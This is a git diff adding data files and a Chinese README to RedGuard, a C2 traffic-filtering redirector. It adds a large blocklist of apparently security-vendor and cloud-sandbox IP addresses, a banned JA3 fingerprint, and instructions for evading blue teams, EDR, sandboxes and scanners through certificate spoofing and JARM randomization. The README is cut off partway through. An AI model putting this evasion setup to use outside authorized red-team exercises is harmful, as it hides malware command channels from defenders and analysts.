+177.98.122.221 +191.31.170.176 +203.106.185.161 +177.68.115.145 +189.79.106.101 +173.212.11.45 +152.254.229.53 +183.88.214.182 +94.230.19.45 +189.59.98.203 +200.75.18.27 +179.43.117.222 +191.33.214.40 +18.138.235.54 +187.4.207.75 +179.208.70.187 +177.34.245.188 +185.179.142.133 +200.150.126.65 +117.213.79.34 +18.231.109.1 +175.139.26.22 +189.112.203.147 +115.133.17.79 +177.94.103.66 +45.236.240.90 +189.112.53.38 +45.236.240.90 +177.100.82.233 +3.25.180.114 +191.55.16.172 +54.206.99.177 +191.31.83.128 +179.254.36.131 +177.100.198.32 +103.242.69.82 +88.249.164.79 +177.43.156.225 +40.87.105.253 +191.55.192.133 +183.88.214.182 +66.97.41.240 +190.19.209.209 +187.36.16.84 +45.236.240.90 +196.46.63.202 +177.157.44.116 +185.66.153.68 +189.27.5.25 +45.236.240.90 +189.35.216.62 +35.165.88.248 +177.191.61.185 +189.44.67.140 +177.62.143.56 +181.30.8.146 +191.253.196.1 +189.112.223.46 +183.88.214.182 +45.236.240.90 +45.236.240.90 +183.88.214.182 +196.46.247.46 +45.236.240.90 +86.242.182.214 +45.236.240.90 +179.110.98.207 +192.234.241.46 +45.236.240.90 +77.75.102.53 +41.226.255.172 +45.236.240.90 +45.236.240.90 +147.50.132.81 +189.154.183.146 +187.114.178.229 +183.88.214.182 +45.236.240.90 +45.236.240.90 +185.106.243.175 +181.119.123.24 +183.88.214.182 +183.88.214.182 +45.236.240.90 +200.20.109.41 +183.88.214.182 +59.96.225.180 +183.88.214.182 +186.223.230.83 +201.95.64.25 +117.221.13.254 +183.88.214.182 +105.30.22.66 +45.236.240.90 +179.214.35.226 +187.65.38.15 +201.93.125.194 +183.88.214.182 +183.88.214.182 +131.0.203.242 +177.94.47.116 +45.184.68.155 +197.253.144.120 +83.4.162.25 +41.97.51.38 +45.236.240.90 +45.236.240.90 +183.88.214.182 +115.133.84.136 +183.88.214.182 +177.103.187.238 +191.31.7.114 +177.191.62.101 +187.57.41.109 +177.75.152.239 +91.92.214.9 +179.217.226.242 +191.248.36.155 +201.47.218.48 +191.189.134.166 +191.35.81.140 +183.88.214.182 +45.236.240.90 +177.40.120.35 +185.216.132.45 +115.130.151.66 +201.42.15.106 +183.88.214.182 +45.236.240.90 +183.88.214.182 +177.170.234.151 +177.102.5.136 +191.209.67.241 +200.175.60.221 +213.144.25.107 +116.202.11.74 +191.54.56.82 +189.63.42.210 +189.11.199.230 +202.88.238.212 +183.88.214.182 +65.132.102.4 +45.236.240.90 +177.191.43.187 +179.211.215.128 +82.137.255.129 +177.75.77.70 +213.153.177.18 +41.96.182.98 +181.121.0.40 +179.98.24.124 +186.248.165.5 +177.75.161.77 +173.212.11.45 +179.83.52.208 +189.210.92.68 +189.210.92.69 +83.4.174.82 +66.168.93.173 +212.244.58.231 +191.31.16.86 +201.92.136.246 +183.88.214.182 +183.88.214.182 +175.141.168.186 +183.88.214.182 +179.216.56.181 +191.35.80.220 +177.188.11.57 +183.88.214.182 +93.62.252.55 +191.33.192.66 +177.17.61.162 +183.88.214.182 +186.210.26.25 +179.104.167.186 +2.47.138.83 +45.236.240.90 +105.158.179.4 +177.98.166.33 +52.220.237.249 +121.122.101.239 +85.105.247.231 +191.35.254.38 +81.0.104.37 +138.59.12.96 +162.242.171.47 +45.236.240.225 +45.236.240.226 +45.236.240.224 +52.22.207.204 +113.193.10.224 +186.50.164.117 +183.88.214.182 +45.236.240.90 +177.158.200.26 +177.100.213.47 +189.8.101.246 +177.133.47.42 +189.112.148.102 +180.246.11.195 +107.20.233.115 +45.236.240.90 +45.236.240.227 +189.115.69.128 +83.4.91.23 +179.177.187.138 +191.255.57.207 +189.126.200.110 +177.62.181.138 +191.54.56.185 +20.56.3.150 +45.236.240.90 +177.157.74.114 +3.142.38.133 +209.235.239.137 +58.71.194.90 +105.155.188.115 +189.6.147.108 +115.133.72.109 +189.114.7.159 +45.236.240.90 +179.118.217.18 +179.235.136.128 +45.236.240.90 +177.156.69.143 +122.54.110.83 +66.232.104.106 +54.179.81.26 +183.88.214.182 +183.88.214.182 +191.254.7.108 +187.255.219.135 +189.30.141.87 +154.113.1.29 +201.26.143.103 +138.0.125.83 +62.94.251.226 +116.14.133.22 +45.236.240.90 +186.210.172.75 +179.219.34.167 +179.219.40.196 +187.74.121.198 +179.219.198.215 +183.88.214.182 +203.43.99.43 +115.133.72.6 +175.139.245.136 +187.57.7.119 +41.96.123.38 +177.134.161.161 +188.85.213.165 +192.140.42.189 +8.210.162.13 +179.232.231.202 +132.248.213.12 +13.213.81.10 +103.242.69.82 +191.255.124.43 +45.236.240.90 +45.236.240.90 +45.236.240.90 +191.191.217.10 +190.187.197.20 +187.36.21.196 +179.176.107.107 +179.182.131.65 +45.236.240.90 +182.75.237.106 +79.44.148.151 +189.27.22.132 +201.8.91.178 +177.215.80.196 +204.106.247.130 +191.255.57.252 +66.232.104.106 +189.41.245.220 +187.65.182.29 +196.201.233.43 +179.176.104.162 +187.114.172.89 +179.186.110.169 +179.181.218.106 +177.140.164.28 +20.72.117.146 +219.74.8.135 +170.231.45.167 +58.71.194.90 +189.26.184.194 +194.176.109.187 +191.190.67.63 +45.236.240.90 +81.196.101.50 +177.106.159.166 +187.67.212.101 +201.48.244.1 +186.210.54.212 +105.154.119.78 +177.183.232.39 +200.205.122.114 +200.201.146.234 +74.142.126.91 +189.41.203.214 +63.168.72.12 +177.106.164.161 +200.75.18.27 +191.248.121.80 +189.112.56.221 +83.4.175.83 +200.1.115.19 +186.210.111.28 +41.77.66.20 +45.236.240.90 +186.237.141.186 +189.41.246.47 +52.72.191.40 +54.232.39.164 +189.41.246.94 +201.16.185.75 +187.23.63.42 +186.236.100.63 +189.6.106.66 +186.55.27.221 +138.59.12.96 +191.251.194.50 +187.87.130.18 +62.15.183.105 +168.227.78.94 +177.40.117.80 +217.238.178.87 +46.170.51.102 +18.229.7.160 +177.30.100.247 +177.157.187.207 +177.182.206.87 +175.145.87.18 +189.154.121.93 +134.209.72.231 +177.64.142.215 +179.176.110.18 +191.30.225.89 +46.243.119.30 +191.31.23.0 +189.61.88.13 +200.155.0.108 +186.116.13.48 +177.94.241.206 +191.54.89.26 +187.58.72.78 +179.104.163.216 +187.11.126.90 +177.205.108.36 +189.6.187.51 +77.31.47.59 +179.126.127.0 +177.185.141.73 +179.124.11.101 +201.48.137.43 +113.172.89.61 +189.6.174.18 +23.20.188.45 +191.191.49.136 +200.158.88.113 +177.18.64.27 +41.140.163.236 +187.109.79.227 +203.106.119.215 +198.147.212.235 +89.31.148.170 +189.26.138.34 +179.181.222.118 +191.33.73.130 +170.238.137.71 +177.158.1.165 +160.178.161.9 +177.177.88.194 +179.181.240.68 +170.0.46.252 +68.15.59.118 +201.48.159.190 +197.165.163.87 +177.129.242.251 +179.83.20.63 +201.11.35.13 +200.179.23.43 +189.18.181.160 +179.179.157.239 +186.210.79.8 +199.15.152.210 +199.15.152.211 +191.249.127.213 +189.7.23.150 +98.128.253.227 +189.120.80.15 +177.129.90.20 +179.233.222.122 +74.62.86.166 +195.82.131.85 +35.190.150.220 +189.58.148.177 +189.63.41.193 +179.127.95.234 +35.238.169.20 +189.154.169.138 +138.36.1.131 +189.73.230.186 +202.164.153.164 +189.5.153.172 +138.121.17.240 +187.112.79.39 +183.88.214.182 +187.21.230.6 +83.99.48.158 +213.238.178.85 +196.64.88.236 +200.175.174.49 +179.220.6.176 +177.207.72.205 +189.68.7.92 +168.205.39.208 +186.251.21.218 +80.14.36.232 +150.136.200.66 +179.219.197.158 +91.224.13.253 +45.236.240.90 +177.182.207.29 +189.231.23.52 +186.210.49.133 +177.106.176.229 +88.151.18.147 +177.16.201.202 +177.153.8.152 +168.196.16.114 +186.223.225.118 +38.146.198.84 +179.185.49.99 +150.214.203.47 +186.57.91.130 +189.63.100.118 +115.135.119.131 +128.163.188.75 +115.133.248.142 +177.191.245.144 +187.103.248.190 +189.90.248.111 +186.192.143.135 +105.155.25.99 +94.140.123.129 +189.102.140.241 +189.6.220.84 +38.146.198.196 +201.47.157.105 +13.236.177.42 +177.80.87.36 +179.183.188.90 +186.213.227.68 +3.238.62.46 +189.201.249.248 +187.44.93.75 +189.115.65.10 +4.30.102.82 +58.185.97.236 +117.194.130.125 +34.194.166.221 +187.112.88.248 +103.124.92.147 +179.235.28.96 +179.162.52.205 +191.31.27.210 +34.225.114.254 +200.158.47.103 +179.219.120.134 +199.15.152.210 +181.81.144.255 +177.158.205.62 +191.250.76.216 +199.15.152.211 +189.91.224.226 +45.234.32.185 +203.106.118.107 +187.39.76.175 +179.110.205.125 +201.48.65.190 +103.211.56.71 +201.11.220.28 +131.255.81.162 +34.249.7.214 +113.173.117.31 +187.32.91.37 +121.169.55.134 +179.235.136.93 +74.142.126.91 +179.35.32.55 +191.251.25.25 +41.142.58.77 +176.221.91.98 +179.216.49.95 +4.30.102.81 +45.236.240.90 +177.18.143.199 +201.43.51.18 +189.110.80.105 +177.69.232.81 +177.6.247.203 +177.92.39.116 +179.95.85.103 +201.87.123.56 +117.202.72.48 +216.83.195.207 +187.32.161.48 +191.250.56.109 +177.205.126.164 +191.251.205.173 +189.112.171.78 +183.88.214.182 +54.228.3.216 +177.97.57.244 +190.52.167.121 +216.17.18.138 +60.54.46.185 +45.236.240.90 +91.75.76.138 +191.250.174.61 +191.254.68.234 +189.110.90.65 +187.72.243.52 +59.92.185.112 +177.127.60.239 +88.132.96.188 +190.113.60.5 +216.109.223.142 +179.98.202.113 +41.96.216.241 +54.217.171.116 +190.104.232.179 +103.228.35.252 +186.229.186.70 +177.98.251.157 +177.157.42.78 +213.81.173.234 +186.223.225.118 +210.195.161.157 +203.122.46.189 +45.236.240.90 +189.154.206.107 +177.70.123.107 +122.160.51.106 +189.115.89.227 +45.236.240.90 +181.177.232.15 +191.13.29.53 +177.94.84.8 +179.247.244.170 +179.176.97.247 +179.176.97.86 +179.225.168.176 +5.196.31.23 +45.164.5.39 +45.236.240.90 +179.191.239.187 +59.98.133.83 +189.18.180.227 +177.92.44.19 +183.88.62.108 +168.228.183.99 +201.27.141.215 +189.91.229.57 +154.113.80.65 +138.0.163.246 +186.218.195.199 +45.236.240.90 +186.216.161.30 +173.255.201.22 +177.118.172.188 +41.96.77.181 +179.216.61.215 +45.236.240.90 +59.88.191.177 +195.185.187.98 +79.175.171.9 +179.182.138.101 +201.52.231.63 +189.26.179.18 +177.99.69.175 +15.161.92.2 +3.7.68.35 +15.237.24.106 +34.217.81.227 +3.239.149.69 +18.223.102.239 +18.118.115.209 +13.51.193.197 +15.237.63.182 +18.229.123.112 +52.56.58.110 +54.250.191.73 +54.176.139.74 +59.88.183.83 +129.226.145.57 +217.128.24.254 +3.96.193.73 +54.250.102.189 +35.164.16.91 +3.239.216.144 +157.175.59.31 +18.130.85.190 +18.196.113.205 +18.229.126.5 +18.130.85.190 +18.134.130.16 +34.221.168.101 +15.237.45.112 +3.239.149.69 +3.65.18.128 +18.117.117.88 +54.153.0.62 +189.114.244.122 +191.176.144.72 +3.16.255.139 +18.203.73.51 +16.162.21.49 +201.13.164.73 +52.12.91.213 +3.67.44.249 +186.212.172.220 +191.31.2.109 +51.161.87.159 +157.175.54.120 +13.244.65.24 +3.108.238.230 +191.35.72.0 +187.74.80.243 +81.252.49.227 +186.66.93.131 +177.96.245.154 +45.236.240.90 +187.18.166.154 +45.236.240.90 +196.206.171.231 +201.55.174.227 +37.34.156.83 +180.183.247.168 +54.217.171.116 +154.113.80.65 +179.222.120.231 +171.22.25.127 +179.183.200.159 +181.177.232.16 +187.122.241.248 +213.144.25.78 +179.222.120.209 +103.95.13.182 +177.118.172.200 +189.5.125.179 +179.83.7.223 +45.164.5.16 +179.104.163.151 +179.176.108.248 +189.15.184.157 +96.85.229.180 +34.123.31.51 +135.196.144.54 +160.179.111.254 +187.56.95.38 +191.54.56.90 +200.233.133.35 +179.154.244.12 +157.175.58.218 +210.101.150.56 +202.137.3.246 +179.187.9.189 +177.156.223.238 +179.104.166.119 +179.104.39.194 +18.141.4.239 +188.218.78.83 +189.112.182.189 +191.254.175.72 +142.154.135.87 +189.46.188.16 +189.63.111.123 +189.27.117.35 +189.112.92.44 +69.168.112.5 +212.125.32.8 +177.158.20.44 +8.136.43.145 +179.232.238.51 +179.84.69.117 +45.162.68.29 +175.145.96.213 +152.254.238.88 +189.6.231.198 +179.104.166.215 +177.106.36.160 +189.63.133.154 +187.65.8.82 +187.18.187.48 +186.210.93.122 +216.83.195.207 +177.95.9.174 +59.89.193.28 +54.228.3.216 +177.96.149.217 +118.68.217.52 +200.49.38.2 +179.186.67.107 +179.180.170.25 +187.18.187.48 +177.92.117.6 +181.223.160.198 +175.137.17.82 +201.26.112.107 +69.168.112.3 +179.187.241.99 +69.168.112.2 +201.71.137.36 +179.95.74.245 +188.85.242.82 +187.107.163.181 +105.158.79.253 +115.130.18.107 +59.91.149.216 +189.47.74.225 +200.146.248.237 +179.83.51.91 +189.114.49.74 +179.55.88.234 +187.58.14.157 +186.57.99.236 +177.156.121.201 +189.34.242.153 +62.216.237.49 +191.54.58.101 +196.65.232.30 +93.46.35.37 +213.228.188.134 +179.233.23.147 +213.228.188.136 +213.228.188.135 +41.96.149.162 +115.130.146.158 +179.219.43.103 +179.180.237.209 +69.168.112.5 +69.168.112.3 +216.83.79.237 +179.83.3.165 +167.61.130.192 +189.114.202.127 +177.135.195.243 +81.252.49.227 +218.248.64.249 +78.96.45.29 +177.132.133.13 +177.133.42.117 +132.255.33.81 +189.5.156.48 +189.231.170.84 +45.236.240.90 +167.57.232.160 +177.18.138.242 +219.92.244.219 +179.153.62.169 +191.249.122.204 +181.121.0.40 +177.27.235.40 +189.78.90.153 +79.151.142.167 +183.88.214.182 +177.96.71.215 +45.236.240.90 +59.91.145.45 +179.108.56.18 +81.47.168.199 +117.247.185.219 +115.133.72.169 +177.42.141.163 +177.205.36.122 +83.4.173.219 +130.204.38.243 +175.139.247.101 +191.31.11.58 +179.181.67.5 +45.236.240.90 +194.176.109.132 +189.6.147.62 +118.129.173.133 +45.236.240.90 +65.2.40.174 +189.78.176.190 +59.99.133.197 +61.2.38.150 +74.142.126.91 +191.33.194.144 +177.54.57.162 +186.219.216.91 +177.30.79.81 +69.39.35.243 +81.5.113.114 +5.196.31.23 +41.140.238.91 +175.138.217.234 +201.62.109.213 +189.114.103.197 +124.120.86.187 +45.236.240.90 +177.133.77.97 +179.184.114.133 +81.209.242.10 +167.61.180.30 +83.4.95.139 +186.66.93.131 +177.127.62.46 +179.214.23.241 +179.219.108.220 +179.228.34.44 +118.221.170.7 +154.68.160.164 +123.108.201.214 +183.88.214.182 +103.88.122.201 +72.5.203.126 +189.125.61.7 +189.6.187.181 +194.176.109.132 +202.188.218.88 +177.82.250.161 +59.99.134.178 +191.178.151.62 +179.127.93.69 +177.149.132.134 +45.234.32.185 +45.234.32.185 +61.2.39.183 +189.112.73.1 +177.188.39.181 +81.5.113.97 +45.234.32.185 +189.29.55.210 +45.234.32.185 +109.202.21.82 +45.234.32.185 +45.236.240.90 +83.4.89.6 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +81.21.196.102 +45.234.32.185 +45.234.32.185 +45.234.32.185 +191.35.250.137 +45.234.32.185 +179.232.238.51 +45.234.32.185 +83.110.99.77 +45.234.32.185 +45.234.32.185 +177.27.235.195 +202.164.184.34 +187.72.194.81 +45.234.32.185 +183.88.214.182 +45.234.32.185 +199.38.71.250 +45.234.32.185 +200.94.92.180 +45.234.32.185 +201.16.185.167 +45.234.32.185 +52.67.203.7 +45.234.32.185 +189.112.173.131 +45.234.32.185 +186.206.245.71 +45.234.32.185 +45.234.32.185 +177.96.70.45 +45.236.240.90 +143.208.212.177 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +52.37.131.217 +45.234.32.185 +179.83.126.35 +69.168.112.5 +189.63.3.249 +213.153.177.18 +145.253.243.115 +145.253.243.116 +177.157.109.182 +41.96.206.45 +177.97.35.171 +45.234.32.185 +41.141.250.224 +192.140.102.174 +13.36.239.231 +13.244.135.194 +18.157.80.83 +3.36.108.201 +13.245.30.48 +15.161.231.102 +13.230.195.71 +13.230.195.71 +3.101.53.241 +157.175.47.19 +13.245.89.118 +13.53.126.89 +54.252.223.87 +18.192.114.254 +35.180.204.120 +52.214.133.123 +13.236.185.14 +15.237.82.189 +16.162.89.96 +52.27.113.49 +18.117.84.83 +13.245.87.77 +13.232.240.21 +52.15.210.228 +18.138.212.19 +18.231.123.223 +13.51.237.106 +3.134.247.28 +13.244.99.97 +13.208.244.46 +3.26.3.99 +15.161.245.201 +15.236.204.177 +13.53.127.214 +52.194.236.63 +18.188.59.5 +54.187.201.167 +15.188.88.234 +52.196.249.84 +15.222.249.184 +3.250.241.240 +18.133.184.244 +3.249.232.26 +34.218.244.63 +52.198.123.213 +15.161.245.130 +15.185.34.35 +3.134.247.28 +3.10.162.127 +13.208.245.185 +54.151.119.125 +18.228.59.216 +15.185.217.221 +35.178.178.59 +3.66.229.25 +13.245.30.119 +54.93.183.27 +45.234.32.185 +18.228.36.90 +13.251.124.184 +13.208.245.192 +16.162.88.31 +35.176.134.128 +54.248.155.184 +35.152.62.130 +63.34.162.166 +16.162.88.31 +15.161.132.102 +13.211.177.76 +35.164.204.75 +18.144.173.80 +15.236.141.205 +13.245.82.147 +54.202.193.214 +3.239.205.120 +54.151.1.217 +13.59.31.135 +3.17.147.188 +18.202.237.10 +3.36.133.2 +13.236.185.14 +13.51.64.63 +18.181.250.244 +13.208.53.41 +13.208.183.147 +15.160.26.4 +34.242.247.127 +18.229.137.209 +52.27.187.155 +52.79.112.85 +18.236.100.250 +3.67.86.45 +52.53.184.221 +3.36.133.2 +15.161.41.49 +18.222.25.110 +34.216.57.3 +13.245.157.75 +18.183.199.105 +3.96.159.66 +99.79.69.25 +79.187.197.188 +13.58.172.71 +18.132.73.11 +65.2.37.78 +35.158.132.199 +3.17.163.249 +52.47.172.39 +13.245.7.8 +13.124.196.110 +99.79.45.65 +18.140.249.52 +52.53.185.172 +52.67.43.199 +35.183.105.86 +3.96.134.84 +13.231.120.243 +15.237.149.123 +54.252.185.101 +3.249.232.26 +18.138.233.6 +186.213.144.185 +45.234.32.185 +83.240.242.186 +191.55.146.166 +186.212.68.191 +189.25.99.93 +45.234.32.185 +170.247.253.135 +115.133.48.164 +45.234.32.185 +201.182.186.98 +177.133.78.54 +45.234.32.185 +45.234.32.185 +45.234.2.197 +45.234.32.185 +45.234.32.185 +5.100.241.131 +177.22.36.233 +183.88.214.182 +45.234.32.185 +177.97.188.122 +79.188.177.61 +78.96.45.22 +54.209.82.14 +123.108.201.214 +177.235.44.219 +194.224.185.110 +177.16.199.183 +179.251.149.72 +115.135.241.177 +212.123.239.150 +85.121.32.222 +85.105.91.45 +45.179.72.227 +15.237.150.233 +179.222.122.84 +187.65.64.244 +177.43.155.159 +219.92.24.103 +175.139.130.236 +177.134.161.50 +123.252.255.153 +34.123.31.51 +181.43.77.89 +179.162.101.73 +179.155.157.104 +201.122.204.50 +201.20.82.181 +177.158.3.195 +177.92.44.211 +191.35.143.150 +72.10.210.122 +191.193.203.75 +191.249.126.1 +179.156.234.208 +186.215.73.84 +187.53.238.224 +186.50.208.211 +83.4.174.243 +177.148.188.47 +191.35.242.177 +3.239.60.228 +177.99.76.45 +152.171.91.71 +177.98.239.70 +190.64.83.162 +177.16.197.202 +191.23.43.39 +179.235.166.40 +186.212.135.57 +177.35.91.248 +157.100.226.217 +186.216.161.30 +118.221.170.7 +179.99.27.133 +186.213.83.66 +117.203.77.187 +177.17.118.103 +41.78.201.138 +69.168.112.3 +201.47.182.239 +179.162.106.45 +54.168.235.31 +94.187.238.110 +34.234.111.74 +59.96.225.168 +59.92.182.235 +189.26.169.105 +45.236.240.90 +85.25.26.251 +70.37.252.23 +187.35.34.64 +45.234.32.185 +45.234.32.185 +69.39.35.226 +177.96.51.32 +45.234.32.185 +200.98.162.228 +15.223.25.92 +45.234.32.185 +45.234.32.185 +191.190.69.76 +45.234.32.185 +45.234.32.185 +189.34.243.23 +45.234.32.185 +200.98.142.42 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +200.196.247.79 +96.85.229.180 +45.234.32.185 +203.176.185.49 +45.234.32.185 +200.143.14.24 +41.142.79.183 +179.219.129.136 +45.234.32.185 +191.35.81.122 +45.234.32.185 +201.95.69.177 +3.26.14.143 +177.102.194.34 +45.234.32.185 +189.114.171.46 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +45.234.32.185 +177.103.97.187 +191.54.133.118 +170.84.114.95 +45.234.32.185 +177.96.69.91 +45.234.32.185 +52.166.243.145 +189.154.209.165 +207.140.245.6 +194.156.152.139 +177.135.55.195 +179.181.216.194 +189.100.49.221 +186.227.0.23 +45.234.32.185 +45.234.32.185 +179.187.80.165 +45.234.32.185 +41.141.210.93 +45.234.32.185 +191.7.145.62 +186.210.24.63 +58.71.206.18 +45.234.32.185 +40.68.173.22 +45.236.240.90 +67.52.210.105 +183.88.214.182 +183.82.103.133 +189.91.224.205 +179.159.139.3 +45.234.32.185 +45.234.32.185 +104.40.153.112 +13.229.107.126 +191.187.123.223 +69.39.35.242 +177.96.48.169 +177.206.150.230 +150.107.43.143 +206.248.216.203 +45.236.240.90 +45.234.32.185 +177.157.85.212 +52.233.143.134 +45.234.32.185 +186.70.104.84 +45.234.32.185 +177.20.207.131 +45.234.32.185 +45.234.32.185 +189.58.165.225 +45.234.32.185 +3.12.241.51 +45.236.240.90 +186.207.248.190 +14.192.239.202 +45.234.32.185 +191.187.100.69 +115.135.125.137 +45.234.32.185 +3.237.174.198 +45.234.32.185 +189.76.191.175 +186.215.53.3 +177.182.172.104 +189.41.246.235 +45.234.32.185 +20.198.121.4 +150.107.43.140 +152.70.65.244 +45.234.32.185 +191.31.27.109 +45.234.32.185 +177.157.81.57 +210.4.6.23 +40.68.125.53 +45.234.32.185 +177.159.62.182 +45.234.32.185 +200.187.162.92 +152.250.165.17 +77.31.1.91 +191.17.237.12 +64.90.127.143 +102.64.7.34 +124.120.86.174 +185.184.64.193 +45.234.32.185 +41.242.48.30 +212.114.197.248 +45.234.32.185 +187.58.53.97 +201.92.135.162 +45.234.32.185 +45.234.32.185 +45.236.240.89 +45.234.32.185 +65.64.176.102 +45.234.32.185 +191.31.81.53 +45.234.32.185 +187.75.89.161 +72.5.203.126 +186.218.195.205 +179.251.156.101 + +# Cloud sandbox +74.125.190.14 +220.181.151.179 +8.210.169.243 +220.181.151.173 +173.194.171.9 +218.12.99.192 +218.12.99.209 +172.217.43.215 +172.217.43.209 +172.253.4.3 +74.125.41.67 +172.217.42.10 +172.253.5.5 +172.253.5.1 +172.253.6.5 +172.253.6.2 +172.217.42.6 +60.205.226.65 +172.70.205.84 +172.69.32.100 +172.253.1.4 +74.125.181.129 +60.29.229.59 +172.253.4.4 +173.194.93.5 +172.253.211.66 +220.181.151.176 +172.253.237.3 +218.12.99.183 +172.253.4.2 +172.69.32.104 +74.125.190.147 +220.181.151.174 +172.253.6.3 +172.217.42.12 +172.217.43.141 +172.253.1.5 +172.70.205.83 +172.253.4.1 +172.253.211.71 +195.123.241.30 +106.75.21.38 +173.194.93.13 +106.75.64.221 +87.115.231.238 +172.255.125.168 +195.123.240.173 +106.75.33.178 +106.75.75.245 +106.75.4.47 +106.75.62.127 +117.50.23.192 +106.75.101.97 +202.129.16.147 +138.199.18.141 +20.199.106.211 +117.50.6.105 +106.75.12.189 +20.79.223.156 +146.70.37.210 +165.231.253.215 +51.75.141.254 +106.75.66.75 +106.75.96.77 +218.232.76.136 +46.246.122.39 +13.235.76.19 +193.19.204.73 +164.90.241.135 +13.36.176.42 +202.43.6.38 +117.50.8.39 +117.50.22.141 +202.129.16.151 +107.150.31.136 +68.183.245.101 +92.17.138.152 +109.249.187.24 +128.90.63.96 +18.197.46.220 +` diff --git a/data/banned_ja3.go b/data/banned_ja3.go new file mode 100644 index 0000000..7a50d80 --- /dev/null +++ b/data/banned_ja3.go @@ -0,0 +1,10 @@ +/** + * @Author 风起 + * @contact: onlyzaliks@gmail.com + * @File: banned_ja3.go + * @Time: 2022/7/4 14:25 + **/ + +package data + +var BANJA3 = `55826aa9288246f7fcafab38353ba734` diff --git a/doc/README_CN.md b/doc/README_CN.md index ec204ae..027b504 100644 --- a/doc/README_CN.md +++ b/doc/README_CN.md @@ -1,380 +1,380 @@ -

RedGuard - Excellent C2 Front Flow Control tool

- -[![GitHub stars](https://img.shields.io/github/stars/wikiZ/RedGuard)](https://github.com/knownsec/Kunyu) [![GitHub issues](https://img.shields.io/github/issues/wikiZ/RedGuard)](https://github.com/knownsec/Kunyu/issues) [![GitHub release](https://img.shields.io/github/release/wikiZ/RedGuard)](https://github.com/knownsec/Kunyu/releases) [![](https://img.shields.io/badge/author-风起-blueviolet)](https://github.com/wikiZ) - -中文文档 | [English](https://github.com/wikiZ/RedGuard/blob/main/README.md) - -![1653117445(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/42d448a4cd030c05bacb8bde759b5d8.png) - -# 0x00 介绍 - -## 工具介绍 - -RedGuard,是一款C2设施前置流量控制技术的衍生作品,有着更加轻量的设计、高效的流量交互、以及使用go语言开发具有的可靠兼容性。它所解决的核心问题也是在面对日益复杂的红蓝攻防演练行动中,给予攻击队更加优秀的C2基础设施隐匿方案,赋予C2设施的交互流量以流量控制功能,拦截那些“恶意”的分析流量,更好的完成整个攻击任务。 - -RedGuard是一个C2设施前置流量控制工具,可以避免Blue Team,AVS,EDR,Cyberspace Search Engine的检查。 - -## 应用场景 - -- 攻防演练中防守方根据态势感知平台针对C2交互流量的分析溯源 -- 根据JA3指纹库识别防范云沙箱环境下针对木马样本的恶意分析 -- 阻止恶意的请求来实施重放攻击,实现混淆上线的效果 -- 在明确上线服务器IP的情况下,以白名单的方式限制访问交互流量的请求 -- 防范网络空间测绘技术针对C2设施的扫描识别,并重定向或拦截扫描探针的流量 -- 支持对多个C2服务器的前置流量控制,并可实现域前置的效果实现负载均衡上线,达到隐匿的效果 -- 能够通过请求IP反查API接口针对根据 IP 地址的归属地进行地域性的主机上线限制 -- 在不更改源码的情况下,解决分阶段checksum8规则路径解析存在的强特征。 -- 通过目标请求的拦截日志分析蓝队溯源行为,可用于跟踪对等连接事件/问题 -- 具有自定义对样本合法交互的时间段进行设置,实现仅在工作时间段内进行流量交互的功能 -- Malleable C2 Profile 解析器能够严格根据 malleable profile验证入站 HTTP/S 请求,并在违规情况下丢弃外发数据包(支持Malleable Profiles 4.0+) -- 内置大量与安全厂商相关联的设备、蜜罐、云沙箱的IPV4地址黑名单,实现自动拦截重定向请求流量 -- 可通过自定义工具与样本交互的SSL证书信息、重定向URL,以规避工具流量的固定特征 -- .......... - -# 0x01 安装 - -可以直接下载并使用已经编译好的版本,也可以远程下载go包进行自主编译执行。 - -```bash -git clone https://github.com/wikiZ/RedGuard.git -cd RedGuard -# 也可以使用upx压缩编译后的文件体积 -go build -ldflags "-s -w" -trimpath -# 赋予工具可执行权限,并进行初始化操作 -chmod +x ./RedGuard&&./RedGuard - -``` - -# 0x02 配置说明 - -## 初始化 - -如下图,首先对RedGuard赋予可执行权限并进行初始化操作,第一次运行会在当前用户目录下生成配置文件,以实现灵活的功能配置,**配置文件名:.RedGuard_CobaltStrike.ini**。 - -![1653117707(1).png](https://raw.githubusercontent.com/wikiZ/RedGuardImage/main/1656308555577.jpg) - -**配置文件内容:** - -![1653117707(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656310498272.png) - -cert的配置选项主要是针对样本与C2前置设施的HTTPS流量交互证书的配置信息,proxy主要用于配置反向代理流量中的控制选项,具体使用会在下面进行详细讲解。 - -在流量的交互中使用的SSL证书会生成在RedGuard执行所在目录下的cert-rsa/目录下,可以通过修改配置文件进行工具的基础功能启停**(证书的序列号是根据时间戳生成的,不用担心被以此关联特征)**。如果你想要使用自己的证书,只需要重命名为ca.crt和ca.key覆盖在cert-rsa/目录下即可。 - -```bash -openssl x509 -in ca.crt -noout -text -``` - -![1653118330(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/1656308972417.jpg) - -每次启动RedGuard都会更新随机TLS JARM指纹,防止被以此佐证C2设施。 - -![1653118330(1).png](https://github.com/wikiZ/RedGuardImage/raw/main/d2d8d30fcd349bd4567c685aaa93451.jpg) - -在使用自己证书的情况下,到配置文件中修改HasCert参数为true,防止因为JARM混淆随机化导致的CipherSuites加密套件与自定义证书不兼容导致的无法正常通信问题。 - -```bash -# Whether to use the certificate you have applied for true/false -HasCert = false -``` - -## RedGuard Usage - -```bash -root@VM-4-13-ubuntu:~# ./RedGuard -h - -Usage of ./RedGuard: - -DropAction string - RedGuard interception action (default "redirect") - -HasCert string - Whether to use the certificate you have applied for (default "false") - -allowIP string - Proxy Requests Allow IP (default "*") - -allowLocation string - Proxy Requests Allow Location (default "*") - -allowTime string - Proxy Requests Allow Time (default "*") - -common string - Cert CommonName (default "*.aliyun.com") - -country string - Cert Country (default "CN") - -dns string - Cert DNSName (default "*.aliyun.com,manager.channel.aliyun.com,*.acs-internal.aliyuncs.com\",*.connect.aliyun.com,aliyun.com,whois.www.net.cn,tianchi-global.com") - -host string - Set Proxy HostTarget (default "{\"360.net\":\"http://127.0.0.1:8080\",\"360.com\":\"https://127.0.0.1:4433\"}") - -http string - Set Proxy HTTP Port (default ":80") - -https string - Set Proxy HTTPS Port (default ":443") - -ip string - IPLookUP IP - -locality string - Cert Locality (default "HangZhou") - -location string - IPLookUP Location (default "风起") - -malleable string - Set Proxy Requests Filter 